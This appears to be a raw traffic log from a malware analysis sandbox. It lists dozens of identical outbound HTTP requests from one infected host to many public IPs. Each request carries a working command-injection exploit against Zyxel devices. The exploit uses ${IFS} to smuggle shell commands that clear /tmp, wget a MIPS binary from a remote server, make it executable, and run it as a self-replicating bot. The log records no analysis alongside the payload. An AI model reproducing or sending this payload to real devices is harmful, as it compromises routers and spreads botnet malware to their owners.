                                                        Jan 28, 2024 10:12:52.402730942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4387192.168.2.144531866.195.75.197443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.402779102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4388192.168.2.1445002150.23.173.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.402826071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4389192.168.2.1446682147.165.23.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.402879953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4390192.168.2.1445382222.183.237.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.402905941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4391192.168.2.1451094161.95.129.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.402945995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4392192.168.2.1434724126.49.8.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.402998924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4393192.168.2.145355240.91.65.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.403022051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4394192.168.2.1434288125.103.139.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.403058052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4395192.168.2.1439444143.46.190.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.403090954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4396192.168.2.1433518149.250.64.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.403099060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4397192.168.2.14414768.146.233.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.403139114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4398192.168.2.1457158209.11.14.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.403173923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4399192.168.2.143722631.177.128.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.403223038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4400192.168.2.1441556122.55.148.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.403274059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4401192.168.2.1457680159.80.60.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.403300047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4402192.168.2.14454862.157.41.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.403332949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4403192.168.2.144440698.40.4.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.403357983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4404192.168.2.144088464.134.149.11443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.403409004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4405192.168.2.1442342168.97.116.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.403450012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4406192.168.2.1438718107.94.12.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.403493881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4407192.168.2.1432856212.114.66.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.403523922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4408192.168.2.1445954126.25.222.65443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.403575897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4409192.168.2.144757290.160.127.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.403613091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4410192.168.2.1458884133.141.23.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.403642893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4411192.168.2.143938624.114.114.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.403686047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4412192.168.2.143501696.174.77.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.403728008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4413192.168.2.1450694199.114.187.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.403764963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4414192.168.2.1434064146.150.104.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.403800964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4415192.168.2.1440512139.9.147.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.403827906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4416192.168.2.1433652167.62.67.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.403907061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4417192.168.2.1437508202.142.112.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.403943062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4418192.168.2.1451848143.165.66.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.403994083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4419192.168.2.1444932180.174.78.119443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.404014111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4420192.168.2.143764883.60.27.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.404074907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4421192.168.2.1434112163.169.196.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.404105902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4422192.168.2.1435318186.219.173.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.404144049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4423192.168.2.1437406177.61.188.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.404195070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4424192.168.2.143926297.181.86.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.404242039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4425192.168.2.1433928213.108.61.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.404289961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4426192.168.2.1452564138.90.210.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.404311895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4427192.168.2.14593509.150.119.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.404364109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4428192.168.2.1454702162.88.159.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.404400110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4429192.168.2.1433548221.152.239.208443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.404438019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4430192.168.2.1446154120.88.184.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.404470921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4431192.168.2.143947489.130.15.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.404506922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4432192.168.2.145961067.226.168.91443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.404541969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4433192.168.2.143892050.145.24.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.404588938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4434192.168.2.14531224.17.140.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.404618979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4435192.168.2.1442450176.210.202.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.404650927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4436192.168.2.1437278144.197.51.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.404714108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4437192.168.2.1459752188.106.207.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.404736042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4438192.168.2.1443370110.31.106.254443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.404781103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4439192.168.2.1448188125.97.112.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.404814005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4440192.168.2.1445814108.47.208.114443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.404845953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4441192.168.2.1432884200.179.24.6443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.404891968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4442192.168.2.144183248.235.55.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.404912949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4443192.168.2.144248890.90.201.230443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.404963017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4444192.168.2.1452100209.178.163.43443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.404990911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4445192.168.2.144524473.237.144.98443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.405041933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4446192.168.2.144753899.197.159.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.405070066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4447192.168.2.1456944115.59.93.90443
                                                        TimestampBytes transferredDirectionData
